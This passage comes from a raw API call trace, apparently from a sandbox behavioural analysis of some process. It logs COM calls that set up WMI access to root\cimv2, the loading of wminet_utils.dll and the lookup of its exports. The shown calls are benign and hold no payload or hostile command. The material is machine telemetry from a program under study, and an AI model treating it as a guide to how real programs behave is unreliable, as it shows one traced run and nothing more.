Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6cc354e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x477f2c8 | out: ppv=0x477f2c8*=0x4f5290) returned 0x0 [0154.034] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f5290, riid=0x6cbe95e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x477f4e0 | out: ppvObject=0x477f4e0*=0x0) returned 0x80004002 [0154.034] WbemDefPath:IClassFactory:CreateInstance (in: This=0x4f5290, pUnkOuter=0x0, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x477f4f4 | out: ppvObject=0x477f4f4*=0x4f6390) returned 0x0 [0154.036] WbemDefPath:IUnknown:Release (This=0x4f5290) returned 0x0 [0154.036] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f6390, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x477f114 | out: ppvObject=0x477f114*=0x4f6390) returned 0x0 [0154.038] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f6390, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x477f0d0 | out: ppvObject=0x477f0d0*=0x0) returned 0x80004002 [0154.038] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f6390, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x477ecc4 | out: ppvObject=0x477ecc4*=0x0) returned 0x80004002 [0154.038] WbemDefPath:IUnknown:AddRef (This=0x4f6390) returned 0x3 [0154.038] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f6390, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x477ea2c | out: ppvObject=0x477ea2c*=0x0) returned 0x80004002 [0154.038] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f6390, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x477e9dc | out: ppvObject=0x477e9dc*=0x0) returned 0x80004002 [0154.038] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f6390, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x477e9e8 | out: ppvObject=0x477e9e8*=0x4f7238) returned 0x0 [0154.039] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x4f7238, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x477e9f0 | out: pCid=0x477e9f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0154.039] WbemDefPath:IUnknown:Release (This=0x4f7238) returned 0x3 [0154.039] CoGetContextToken (in: pToken=0x477ea48 | out: pToken=0x477ea48) returned 0x0 [0154.040] CoGetContextToken (in: pToken=0x477ee50 | out: pToken=0x477ee50) returned 0x0 [0154.040] WbemDefPath:IUnknown:QueryInterface (in: This=0x4f6390, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x477eee0 | out: ppvObject=0x477eee0*=0x0) returned 0x80004002 [0154.040] WbemDefPath:IUnknown:Release (This=0x4f6390) returned 0x2 [0154.040] WbemDefPath:IUnknown:Release (This=0x4f6390) returned 0x1 [0154.040] SetEvent (hEvent=0x2d4) returned 1 Thread: id = 19 os_tid = 0x136c Thread: id = 20 os_tid = 0x13fc Thread: id = 21 os_tid = 0x79c Thread: id = 22 os_tid = 0x13d4 [0154.091] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0154.091] RoInitialize () returned 0x1 [0154.091] RoUninitialize () returned 0x0 [0154.092] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x4c9f7fc | out: lpiid=0x4c9f7fc) returned 0x0 [0154.094] CoGetClassObject (in: rclsid=0x4f5fcc*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6cc354e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4c9f510 | out: ppv=0x4c9f510*=0x5090d8) returned 0x0 [0154.274] WbemLocator:IUnknown:QueryInterface (in: This=0x5090d8, riid=0x6cbe95e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4c9f728 | out: ppvObject=0x4c9f728*=0x0) returned 0x80004002 [0154.274] WbemLocator:IClassFactory:CreateInstance (in: This=0x5090d8, pUnkOuter=0x0, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9f73c | out: ppvObject=0x4c9f73c*=0x4f5360) returned 0x0 [0154.274] WbemLocator:IUnknown:Release (This=0x5090d8) returned 0x0 [0154.275] WbemLocator:IUnknown:QueryInterface (in: This=0x4f5360, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9f35c | out: ppvObject=0x4c9f35c*=0x4f5360) returned 0x0 [0154.275] WbemLocator:IUnknown:QueryInterface (in: This=0x4f5360, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4c9f318 | out: ppvObject=0x4c9f318*=0x0) returned 0x80004002 [0154.275] WbemLocator:IUnknown:QueryInterface (in: This=0x4f5360, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4c9ef0c | out: ppvObject=0x4c9ef0c*=0x0) returned 0x80004002 [0154.275] WbemLocator:IUnknown:AddRef (This=0x4f5360) returned 0x3 [0154.275] WbemLocator:IUnknown:QueryInterface (in: This=0x4f5360, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4c9ec74 | out: ppvObject=0x4c9ec74*=0x0) returned 0x80004002 [0154.276] WbemLocator:IUnknown:QueryInterface (in: This=0x4f5360, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4c9ec24 | out: ppvObject=0x4c9ec24*=0x0) returned 0x80004002 [0154.276] WbemLocator:IUnknown:QueryInterface (in: This=0x4f5360, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9ec30 | out: ppvObject=0x4c9ec30*=0x0) returned 0x80004002 [0154.276] CoGetContextToken (in: pToken=0x4c9ec90 | out: pToken=0x4c9ec90) returned 0x0 [0154.276] CoGetObjectContext (in: riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x509304 | out: ppv=0x509304*=0x4d1158) returned 0x0 [0154.278] CoGetContextToken (in: pToken=0x4c9f098 | out: pToken=0x4c9f098) returned 0x0 [0154.278] WbemLocator:IUnknown:QueryInterface (in: This=0x4f5360, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9f128 | out: ppvObject=0x4c9f128*=0x0) returned 0x80004002 [0154.278] WbemLocator:IUnknown:Release (This=0x4f5360) returned 0x2 [0154.278] WbemLocator:IUnknown:Release (This=0x4f5360) returned 0x1 [0154.280] CoGetContextToken (in: pToken=0x4c9f708 | out: pToken=0x4c9f708) returned 0x0 [0154.280] CoGetContextToken (in: pToken=0x4c9f668 | out: pToken=0x4c9f668) returned 0x0 [0154.280] WbemLocator:IUnknown:QueryInterface (in: This=0x4f5360, riid=0x4c9f738*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x4c9f734 | out: ppvObject=0x4c9f734*=0x4f5360) returned 0x0 [0154.280] WbemLocator:IUnknown:AddRef (This=0x4f5360) returned 0x3 [0154.280] WbemLocator:IUnknown:Release (This=0x4f5360) returned 0x2 [0154.295] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x4f6390, puCount=0x4c9f8cc | out: puCount=0x4c9f8cc*=0x2) returned 0x0 [0154.295] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=8, puBuffLength=0x4c9f8c8*=0x0, pszText=0x0 | out: puBuffLength=0x4c9f8c8*=0xf, pszText=0x0) returned 0x0 [0154.295] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=8, puBuffLength=0x4c9f8c8*=0xf, pszText="00000000000000" | out: puBuffLength=0x4c9f8c8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x4c9eb4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0154.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x4c9f050, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0154.308] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x6c240000 [0154.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x4c9f084, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1a÷ht\x8fu\x80 «·lHóÉ\x04(\x88P", lpUsedDefaultChar=0x0) returned 13 [0154.495] GetProcAddress (hModule=0x6c240000, lpProcName="ResetSecurity") returned 0x6c2426fe [0154.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x4c9f084, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0154.512] GetProcAddress (hModule=0x6c240000, lpProcName="SetSecurity") returned 0x6c242740 [0154.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x4c9f080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 18 [0154.528] GetProcAddress (hModule=0x6c240000, lpProcName="BlessIWbemServices") returned 0x6c241e89 [0154.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x4c9f078, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 24 [0154.617] GetProcAddress (hModule=0x6c240000, lpProcName="BlessIWbemServicesObject") returned 0x6c241edb [0154.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x4c9f080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 17 [0154.712] GetProcAddress (hModule=0x6c240000, lpProcName="GetPropertyHandle") returned 0x6c2423d4 [0154.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x4c9f080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 18 [0154.748] GetProcAddress (hModule=0x6c240000, lpProcName="WritePropertyValue") returned 0x6c242837 [0154.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x4c9f08c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 5 [0154.771] GetProcAddress (hModule=0x6c240000, lpProcName="Clone") returned 0x6c241f2d [0154.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x4c9f080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0154.794] GetProcAddress (hModule=0x6c240000, lpProcName="VerifyClientKey") returned 0x6c2427d4 [0154.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x4c9f080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0154.805] GetProcAddress (hModule=0x6c240000, lpProcName="GetQualifierSet") returned 0x6c242435 [0154.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x4c9f08c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0154.813] GetProcAddress (hModule=0x6c240000, lpProcName="Get") returned 0x6c2422f4 [0154.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x4c9f08c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0154.844] GetProcAddress (hModule=0x6c240000, lpProcName="Put") returned 0x6c2424de [0154.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x4c9f08c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 6 [0154.932] GetProcAddress (hModule=0x6c240000, lpProcName="Delete") returned 0x6c242151 [0154.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x4c9f088, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNamesD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 8 [0154.972] GetProcAddress (hModule=0x6c240000, lpProcName="GetNames") returned 0x6c2423a2 [0155.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x4c9f080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumerationD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 16 [0155.038] GetProcAddress (hModule=0x6c240000, lpProcName="BeginEnumeration") returned 0x6c241e63 [0155.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x4c9f08c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 4 [0155.067] GetProcAddress (hModule=0x6c240000, lpProcName="Next") returned 0x6c2424a3 [0155.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x4c9f084, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 14 [0155.111] GetProcAddress (hModule=0x6c240000, lpProcName="EndEnumeration") returned 0x6c2421e2 [0155.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x4c9f078, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0155.129] GetProcAddress (hModule=0x6c240000, lpProcName="GetPropertyQualifierSet") returned 0x6c24241f [0155.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x4c9f08c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 5 [0155.337] GetProcAddress (hModule=0x6c240000, lpProcName="Clone") returned 0x6c241f2d [0155.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x4c9f084, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 13 [0155.344] GetProcAddress (hModule=0x6c240000, lpProcName="GetObjectText") returned 0x6c2423be [0155.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x4c9f080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 17 [0155.410] GetProcAddress (hModule=0x6c240000, lpProcName="SpawnDerivedClass") returned 0x6c242786 [0155.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x4c9f084, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 13 [0155.434] GetProcAddress (hModule=0x6c240000, lpProcName="SpawnInstance") returned 0x6c24279c [0155.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x4c9f088, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 9 [0155.438] GetProcAddress (hModule=0x6c240000, lpProcName="CompareTo") returned 0x6c241fad [0155.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x4c9f080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 17 [0155.454] GetProcAddress (hModule=0x6c240000, lpProcName="GetPropertyOrigin") returned 0x6c242409 [0155.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x4c9f084, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFromD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 12 [0155.485] GetProcAddress (hModule=0x6c240000, lpProcName="InheritsFrom") returned 0x6c242448 [0155.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x4c9f088, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethod\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 9 [0155.488] GetProcAddress (hModule=0x6c240000, lpProcName="GetMethod") returned 0x6c24235a [0155.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x4c9f088, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 9 [0155.518] GetProcAddress (hModule=0x6c240000, lpProcName="PutMethod") returned 0x6c2425fa [0155.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x4c9f084, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethodD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 12 [0155.542] GetProcAddress (hModule=0x6c240000, lpProcName="DeleteMethod") returned 0x6c242164 [0155.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x4c9f07c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumeration÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 22 [0155.545] GetProcAddress (hModule=0x6c240000, lpProcName="BeginMethodEnumeration") returned 0x6c241e76 [0155.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x4c9f088, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethod÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 10 [0155.547] GetProcAddress (hModule=0x6c240000, lpProcName="NextMethod") returned 0x6c2424c2 [0155.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x4c9f07c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumerationD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 20 [0155.565] GetProcAddress (hModule=0x6c240000, lpProcName="EndMethodEnumeration") returned 0x6c2421f2 [0155.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x4c9f07c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSet\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 21 [0155.567] GetProcAddress (hModule=0x6c240000, lpProcName="GetMethodQualifierSet") returned 0x6c24238c [0155.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x4c9f080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0155.571] GetProcAddress (hModule=0x6c240000, lpProcName="GetMethodOrigin") returned 0x6c242376 [0155.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x4c9f080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 16 [0155.572] GetProcAddress (hModule=0x6c240000, lpProcName="QualifierSet_Get") returned 0x6c24264c [0155.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x4c9f080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_PutD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 16 [0155.594] GetProcAddress (hModule=0x6c240000, lpProcName="QualifierSet_Put") returned 0x6c24269a [0155.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x4c9f07c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0155.624] GetProcAddress (hModule=0x6c240000, lpProcName="QualifierSet_Delete") returned 0x6c242629 [0155.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x4c9f07c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 